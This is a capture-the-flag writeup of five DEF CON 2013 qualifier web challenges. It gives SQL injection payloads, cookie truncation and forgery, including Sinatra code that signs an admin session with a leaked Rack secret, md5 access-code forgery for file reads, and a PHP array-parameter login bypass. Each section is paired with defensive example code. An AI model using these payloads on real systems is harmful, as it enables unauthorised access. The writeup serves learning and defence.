
DEF CON CTF 2013 Quals - web writeups

I haven't played in a lot of CTF games. I just used to register under a random nickname, take a look at the kinda interesting web challenges and try to solve them in a short period of time. It was like a CTF blitz. However, I decided to give playing CTFs a try. I've joined a new team and challenged DEF CON CTF (ofc, only in the web category). Here are my short writeups (published just after the competition's end) for the web challenges (also called 3dub).


babysfirst
It's just an easy SQL injection (on an SQLite database). We can use sqlite_master to get table and column names:
username=' or 1=1 union select sql from sqlite_master WHERE type='table'--
logged in as CREATE TABLE keys (value string)

And here's the way to get the flag:

username=' or 1=1 union select value from keys--
The key is: literally online lolling on line WucGesJi
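To show what actually goes wrong in babysfirst, here is an added example (my own code, not the challenge's source): the login query rebuilt against an in-memory SQLite database, once with the username pasted into the SQL text and once with a bound parameter, run with the two payloads quoted above. The users table, the "bob" account and the flag value are constructed; the keys table is declared exactly as the writeup's sqlite_master output shows it.

```python
import sqlite3

# Payloads quoted from the writeup above.
PAYLOAD_SCHEMA = "' or 1=1 union select sql from sqlite_master WHERE type='table'--"
PAYLOAD_FLAG = "' or 1=1 union select value from keys--"


def build_db() -> sqlite3.Connection:
    """Constructed fixture: a users table plus the 'keys' table the writeup discovered."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('bob', 'hunter2')")
    con.execute("CREATE TABLE keys (value string)")
    con.execute("INSERT INTO keys VALUES ('FLAG{constructed-sample}')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str) -> list:
    """The flaw: the username is pasted into the SQL text, so the quote, UNION and
    trailing comment inside it are parsed as SQL. Returns every row the query yields,
    which is how 'logged in as CREATE TABLE keys (value string)' comes about."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(con: sqlite3.Connection, username: str) -> list:
    """Same query with a bound parameter: the payload is only ever compared as a string
    value, so sqlite_master and keys are never touched."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in con.execute(sql, (username,))]
```

Against the vulnerable function the first payload returns the CREATE TABLE text of every table and the second returns the flag row; against the parameterised one both payloads return an empty list and only a real username such as "bob" matches.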
badmedicine
We are able to log in as anyone except admin. Every sign-in attempt creates a new cookie, which depends on the chosen login: each letter of the nickname determines two characters of the cookie. We shouldn't even bother reverse-engineering how these cookies are generated. A much faster idea is to log in as adminX, which gives us a new cookie: username=09c8259ca076. All we have to do is strip the last two characters from it (the ones corresponding to the letter X).
Using username=09c8259ca0 cookie gives us the flag:
The key is: who wants oatmeal raisin anyways twumpAdby
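The badmedicine cookie can be cut short because it is assembled letter by letter. The added example below (mine, not the challenge's code; the real derivation is unknown, only its two-hex-characters-per-letter shape) contrasts a constructed per-letter scheme with that shape against an HMAC over the whole name, and checks which of the two lets a truncated "adminX" token pass as "admin". SERVER_KEY is an assumed server-side secret.

```python
import hashlib
import hmac

SERVER_KEY = b"constructed-server-key"  # assumption: a secret only the server holds


def letterwise_token(username: str) -> str:
    """Constructed weak scheme with the writeup's shape: two hex characters per
    letter, each derived from that letter alone. Because the pieces are independent,
    the token for 'adminX' is the token for 'admin' with two characters appended."""
    return "".join(
        hashlib.sha1(SERVER_KEY + ch.encode()).hexdigest()[:2] for ch in username
    )


def mac_token(username: str) -> str:
    """Whole-name HMAC, cut to the same 12 hex characters: dropping two characters
    gives an unrelated string, not another user's token."""
    return hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()[:12]


def cookie_accepted(scheme, claimed_user: str, presented_cookie: str) -> bool:
    """Server-side check: recompute the token for the claimed user and compare
    in constant time."""
    return hmac.compare_digest(scheme(claimed_user), presented_cookie)


def truncation_logs_in_as_admin(scheme) -> bool:
    """The writeup's trick: take the 'adminX' token, drop two characters, present it as 'admin'."""
    truncated = scheme("adminX")[:-2]
    return cookie_accepted(scheme, "admin", truncated)
```

The per-letter scheme accepts the truncated token, the HMAC scheme does not. In a real application the cookie would carry the username next to the MAC (or be an opaque random session id looked up server side); the property that matters is that no substring of one user's token is a valid token for another user.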
hypeman
While trying to get the admin's secret (/secrets/0), an error page is displayed. Let's take a look at it:
rack.session.options
{
  :path=>"/",
  :domain=>nil,
  :expire_after=>nil,
  :secure=>false,
  :httponly=>true,
  :defer=>false,
  :renew=>false,
  :sidbits=>128,
  :secure_random=>SecureRandom,
  :secret=>"wroashsoxDiculReejLykUssyifabEdGhovHabno",
  :coder=>#<Rack::Session::Cookie::Base64::Marshal:0x000000034e2228>
}
rack.session.unpacked_cookie_data
{
  "session_id"=>"6ef1fd11f31860a44f2846c776492c72a3c6ab7233e27ec2c64f8d8ccb9420b4",
  "tracking"=>
  {
    "HTTP_USER_AGENT"=>"50767cb0bf2f1f10587db0e2eb5a1e32d0c887fd",
    "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794",
    "HTTP_ACCEPT_LANGUAGE"=>"e88e52a62f706f3c0ae7d4caaf8925434a837c9f"
  },
  "csrf"=>"b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8",
  "user_name"=>"xxxxxxxxx"
}
We just need to set up our own Sinatra server, create a new admin cookie and sign it (we know the value of :secret).
require 'sinatra'
enable :sessions
set :session_secret, "wroashsoxDiculReejLykUssyifabEdGhovHabno"   # the :secret leaked by the error page
get '/' do
  session[:user_name] = 'admin'
  session[:csrf] = "b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8"
  'session cookie set'
end
A little cookie tampering and the flag is ours:
watch out for this Etdeksogav
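The whole hypeman break rests on the leaked :secret, so here is an added example (my own Python, not Rack's code) of the check the server performs on a Rack 1.x Session::Cookie value. It assumes the layout "<base64 payload>--<HMAC-SHA1 hex of the base64 text>" that Rack 1.x uses and treats the payload as opaque bytes (constructed, standing in for Ruby's Marshal.dump of the session hash). It shows that a cookie minted with the leaked secret verifies cleanly, and that only rotating the secret makes the server reject it.

```python
import base64
import hashlib
import hmac
import secrets

# Value taken from the error page shown in the writeup.
LEAKED_SECRET = "wroashsoxDiculReejLykUssyifabEdGhovHabno"


def sign_cookie(payload: bytes, secret: str) -> str:
    """Assumed Rack 1.x layout: base64 body, '--', HMAC-SHA1 over the base64 text."""
    body = base64.b64encode(payload).decode()
    tag = hmac.new(secret.encode(), body.encode(), hashlib.sha1).hexdigest()
    return f"{body}--{tag}"


def verify_cookie(cookie: str, secret: str):
    """Return the payload bytes if the tag matches under `secret`, else None.
    The tag comparison is constant time, as a server-side check should be."""
    body, sep, tag = cookie.rpartition("--")
    if not sep:
        return None
    expected = hmac.new(secret.encode(), body.encode(), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return base64.b64decode(body)


def forged_cookie_accepted(secret_in_use: str) -> bool:
    """Someone holding the leaked secret signs an 'admin' payload (constructed bytes);
    does a server configured with `secret_in_use` accept it?"""
    forged = sign_cookie(b"constructed-marshal-bytes:user_name=admin", LEAKED_SECRET)
    return verify_cookie(forged, secret_in_use) is not None


def rotate_secret() -> str:
    """The fix once a secret has been printed on an error page: generate a fresh one,
    which invalidates every cookie signed under the old value."""
    return secrets.token_hex(32)
```

With the leaked value still configured the forged cookie verifies; with a rotated secret it does not, and a cookie whose body was edited after signing fails the tag check either way. The other half of the fix is making sure error pages never dump the session options in production.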
rememberme
It's easy to spot that md5('usernames.txt') = 60635c6862d44e8ac17dc5e144c66539.
Now we can easily get access to other files. As passwords.txt looks like a honeypot, we should skip it and check getfile.php.
getfile.php?filename=getfile.php&accesscode=md5('getfile.php')
getfile.php?filename=getfile.php&accesscode=0701593e23e676eaba834916a6ac7272

The source tells us that the file key.txt exists:

getfile.php?filename=key.txt&accesscode=65c2a527098e1f7747eec58e1925b453

The next lines of code reveal how the key hidden in key.txt is generated:

$value = time();
/* --- cut --- */
srand($value);
/* --- cut --- */
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
That's all we need. We have the ciphertext (that's what key.txt displays), which we have to decrypt, and we can also recover the key.
Thanks to srand(), the value of the key can easily be recreated: with a fixed seed, rand() returns the same value every time the script runs. Moreover, the seed is time(), and the value of time() is known, because we can check when the request that displayed the key.txt content was sent (and even if we couldn't get the exact value, we could easily brute-force the small seed space around the time() value).
The next step is just mcrypt_decrypt(), which reveals the flag:
To boldly go where no one has gone before WMx8reNS
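The rememberme weakness is that the key is a function of time(). The added example below (my own Python; it does not reproduce PHP's rand() or mcrypt, which is why the challenge's actual key cannot be recomputed with it) models that with a seeded PRNG and a constructed XOR keystream cipher standing in for AES-CBC, then runs the fallback from the writeup: try every seed within a few minutes of the request time and accept the candidate that decrypts to printable text. Next to it is the key a CSPRNG would have produced, which the same search cannot find. The timestamp, message and window size are constructed.

```python
import hashlib
import random
import secrets


def key_from_seed(seed: int) -> bytes:
    """Constructed analogue of srand($seed); $key = rand(): a 31-bit value fully
    determined by the seed, so whoever knows (or can guess) the seed knows the key."""
    return random.Random(seed).getrandbits(31).to_bytes(4, "big")


def strong_key() -> bytes:
    """What the generator should have done: 128 bits from the OS CSPRNG, no seed to enumerate."""
    return secrets.token_bytes(16)


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher standing in for mcrypt AES-CBC: XOR with a SHA-256 counter stream.
    Encryption and decryption are the same operation."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + offset.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[offset : offset + 32], block))
    return bytes(out)


def recover_by_time_window(ciphertext: bytes, approx_time: int, window: int = 300):
    """The writeup's fallback: try every seed within +/- window seconds of the
    request time. No known plaintext is needed; a candidate is accepted when it
    decrypts to printable ASCII, which a wrong key practically never produces."""
    for seed in range(approx_time - window, approx_time + window + 1):
        plaintext = keystream_xor(key_from_seed(seed), ciphertext)
        if plaintext.isascii() and plaintext.decode("ascii").isprintable():
            return seed, plaintext.decode("ascii")
    return None


def demo(true_time: int = 1_371_000_000):
    """Constructed scenario: the server encrypted at true_time; we only know that
    to within a minute or so. Returns (result for the time-seeded key, result for the CSPRNG key)."""
    message = b"The flag is: constructed-sample-value"
    weak_ct = keystream_xor(key_from_seed(true_time), message)
    strong_ct = keystream_xor(strong_key(), message)
    guess = true_time + 42  # our estimate of the request time is off by 42 seconds
    return recover_by_time_window(weak_ct, guess), recover_by_time_window(strong_ct, guess)
```

The search over 601 candidate seeds recovers the time-seeded key and the message; for the CSPRNG key every candidate yields noise and the function returns None. The same logic applies to any key derived from a predictable seed, whatever cipher sits on top of it.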
worsemedicine
The fastest points ever. We are able to log in as anyone except admin. Instead of sending a request like this:
_utf8=%26%23x2713%3B&verification=7734c700&username=admin&password=

we should "cheat" the challenge with this one:

_utf8=%26%23x2713%3B&verification=7734c700&username[]=admin&password=

Voila!

The key is: computers downtown and computers up in harlem
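The worsemedicine trick works because PHP turns a "username[]" field into an array, and an array is never equal to the string "admin". Here is an added example (my own code, not the challenge's) with a small parser that applies PHP's "name[]" convention to the two request bodies quoted above, a loose check that mirrors the behaviour the bypass implies, and a strict check that rejects anything that is not a plain string before comparing.

```python
from urllib.parse import parse_qsl

# Request bodies quoted from the writeup above.
NORMAL_BODY = "_utf8=%26%23x2713%3B&verification=7734c700&username=admin&password="
BYPASS_BODY = "_utf8=%26%23x2713%3B&verification=7734c700&username[]=admin&password="


def parse_php_form(body: str) -> dict:
    """Constructed re-implementation of how PHP shapes $_POST:
    'k=v' becomes a string, 'k[]=v' becomes a list (repeated 'k[]' appends)."""
    form = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.endswith("[]"):
            form.setdefault(name[:-2], []).append(value)
        else:
            form[name] = value
    return form


def admin_blocked_loose(form: dict) -> bool:
    """Mirrors the check the bypass implies: only the exact string 'admin' is refused,
    so the list ['admin'] sails through."""
    return form.get("username") == "admin"


def admin_blocked_strict(form: dict) -> bool:
    """Refuse anything that is not a plain string, then compare. A list, a missing
    field or an empty field is treated as blocked rather than as 'not admin'."""
    user = form.get("username")
    if not isinstance(user, str) or not user:
        return True
    return user == "admin"
```

The loose check blocks the first body and lets the second through; the strict check blocks both and still allows an ordinary username such as "bob". The general rule: decide the expected type of every parameter first, and treat a type mismatch as a rejection, never as "not the forbidden value".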

Yeah, web category is cleared!